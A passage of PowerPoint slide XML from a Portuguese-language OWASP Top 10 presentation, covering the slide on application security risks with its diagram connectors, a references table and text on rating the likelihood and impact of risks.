          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4191000" y="2667000"/>
              <a:ext cx="457200" cy="233348"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:miter lim="800000"/>
              <a:headEnd type="oval" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="58" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="80" idx="3"/>
              <a:endCxn id="64" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4190999" y="2900348"/>
              <a:ext cx="457201" cy="204802"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:miter lim="800000"/>
              <a:headEnd type="oval" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="33" name="AutoShape 108"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="752475" y="2657475"/>
              <a:ext cx="619125" cy="419100"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:headEnd type="oval" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent2"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent2"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent2"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="88" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="81" idx="3"/>
              <a:endCxn id="62" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4191000" y="3290903"/>
              <a:ext cx="457200" cy="709597"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:headEnd type="oval" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent2"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent2"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent2"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="91" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="40" idx="3"/>
              <a:endCxn id="85" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2209800" y="3102769"/>
              <a:ext cx="490728" cy="897466"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:headEnd type="oval" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent2"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent2"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent2"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="110" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="85" idx="3"/>
              <a:endCxn id="81" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505199" y="4000235"/>
              <a:ext cx="228601" cy="265"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:headEnd type="oval" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent2"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent2"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent2"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="117" name="AutoShape 149"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="62" idx="4"/>
              <a:endCxn id="19" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5334000" y="2657475"/>
              <a:ext cx="381000" cy="633428"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:headEnd type="oval" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent2"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent2"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent2"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="121" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3659399" y="2090853"/>
              <a:ext cx="590226" cy="297517"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Security</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Controls</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1629844" y="76199"/>
            <a:ext cx="5228156" cy="762001"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Riscos de Segurança em Aplicações</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Text Placeholder 64"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1524000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Risco</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="68" name="Table 67"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1486804215"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4572000" y="5105401"/>
          <a:ext cx="2286000" cy="4045579"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2286000"/>
              </a:tblGrid>
              <a:tr h="328300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Referências</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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rgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="37102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700" kern="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smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:hlinkClick r:id="rId4"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Article on Threat/Risk Modeling</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>External</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:hlinkClick r:id="rId4"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>FAIR Information Risk Framework</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Microsoft Threat Modeling (STRIDE and DREAD)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="1"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u="sng" kern="1200" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="69" name="Table 68"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3667585925"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="5105401"/>
          <a:ext cx="4495800" cy="4039178"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4495800"/>
              </a:tblGrid>
              <a:tr h="334702">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Qual é o Meu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Risco?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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rgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="3703898">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>O </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> tem seu foco </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="0" dirty="0" smtClean="0"/>
                        <a:t>na identificação dos riscos mais graves para uma ampla gama de organizações. Para cada um destes riscos, nós fornecemos informações genéricas sobre a probabilidade de ocorrência e impacto técnico usando o esquema simples de classificação abaixo, que se baseia na metodologia de avaliação de riscos da OWASP (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>).</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="0" u="sng" dirty="0" smtClean="0"/>
                        <a:t>Somente você</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="0" dirty="0" smtClean="0"/>
                        <a:t> sabe os detalhes do seu ambiente e negócio. Para qualquer aplicação, pode não haver um agente de ameaça que possa executar um ataque relevante, ou o impacto técnico pode não fazer nenhuma diferença para o seu negócio. Portanto, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="0" u="sng" dirty="0" smtClean="0"/>
                        <a:t>você</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="0" dirty="0" smtClean="0"/>
                        <a:t> deve avaliar cada risco, focando nos agentes de ameaça, controles de segurança e impactos no negócio de sua empresa. Nós listamos Agentes de Ameaça como Específicos da Aplicação, e Impactos no Negócio como Específicos do Negócio/Aplicação para indicar que estes </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>são claramente dependentes dos detalhes sobre a sua aplicação em sua empresa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="0" dirty="0" smtClean="0"/>
                        <a:t>. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="0" dirty="0" smtClean="0"/>
                        <a:t>Os nomes dos riscos no Top 10 derivam-se do tipo de ataque, do tipo de vulnerabilidade, ou do tipo de impacto causado. Escolhemos nomes que refletem com precisão os riscos e, quando possível, alinham-se com a terminologia mais provável para auxiliar na conscientização das pessoas.</a:t>
